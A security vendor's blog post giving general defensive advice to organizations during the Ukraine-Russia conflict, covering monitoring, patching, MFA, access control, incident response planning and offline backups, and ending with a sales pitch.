Which cybersecurity measures to take due to Ukraine Russia crisis
As a result of the escalated conflict between Ukraine and Russia, the risk of potential cyberattacks against western organizations is prevalent. In particular, organizations in critical infrastructure sectors providing essential services should be on high alert.
Over the past couple of weeks, Russian threat groups have already demonstrated their capabilities when it comes to nation state attacks by targeting Ukraine government and financial institutions.
National Cybersecurity bodies around the world have issued guidance regarding the threats from Russia during this time. Guidance has come from the CISA in the United States, NCSC in the United Kingdom, and CCB in Belgium. There is still no specific threat intel that attacks outside of Ukraine are underway however we must upgrade our posture to be safe.
Emergency Security Advice
Consult with your cybersecurity staff and partners on how to secure your assets quickly. You may be struggling with what to prioritize. The quick answer is: prioritize everything.
Spotit recommends the following guidance for all organizations:
Empower your Chief Information Security Officer (CISO) and their teams
Your CISO should be your top cybersecurity expert and as such, they need to be empowered to make executive decisions around your security policy. The CISO needs to:
- Enforce internal security policies
- Tighten domain blocking lists
- Prioritize and delegate the implementation of security controls
- Create and test an incident response plan
Mitigate visibility gaps
- Make sure that you have active monitoring on every single asset on every domain you control. The following 5 points are a minimal amount of controls that an organization is suggested to have:
- EDR/XDR on every endpoint
- Email security
- DNS monitoring and blocking
- Firewall and IDS/IPS logs
- Active Directory domain(s) security controls
- Ensure that all these logs are centrally collected and monitored for suspicious activity by your internal/external SOC.
- Review logs daily for unexpected behavior, including:
- Outbound connections to unknown domains and IP’s
- New/Uncategorized domains
- TOR traffic
- Log4j payloads
- Guest wi-fi users
Ideally, any asset in your organization that has a security update released by the vendor should be patched. This includes:
- All computers – Windows, Mac, Linux/Unix, Chromebooks etc.
- All smartphones and tablets
- Firewalls and network hardware
- IoT devices
- CCTV systems
- Access control, door systems
In reality, a lot of organizations struggle to effectively implement a patch management policy that covers everything in a timely fashion. This is where utilizing a vulnerability management solution is essential.
A good vulnerability management solution helps in identifying which patches should be installed first to reduce the most risk for the organization allowing to efficiently manage the available time of the IT team.
Switch to short-term priorities
- Have your cyber contingency plan ready. Our recommendation is to develop, update and test your incident response plan.
- Any security upgrade that you had planned for later in the year: Do it now, even if that means overtime
- Deploy MFA everywhere (especially for remote access services) and consider switching to hardware-controlled MFA devices on admin accounts
- Restrict access to systems to only the staff that requires access, including SharePoint and OneDrive/other cloud storage
- Delete old unnecessary/unused accounts, especially from staff that have left the business.
- Reduce the external attack surface by disabling unused or unessential ports
- Take back-ups of critical devices and information and store them offline. Ensure that the process to restore these back-ups is tested on a regular interval.
Would you like more information about how spotit can assist in resolving your security concerns? Do you need support in developing, challenging your incident response plan? Don’t hesitate to contact us at [email protected]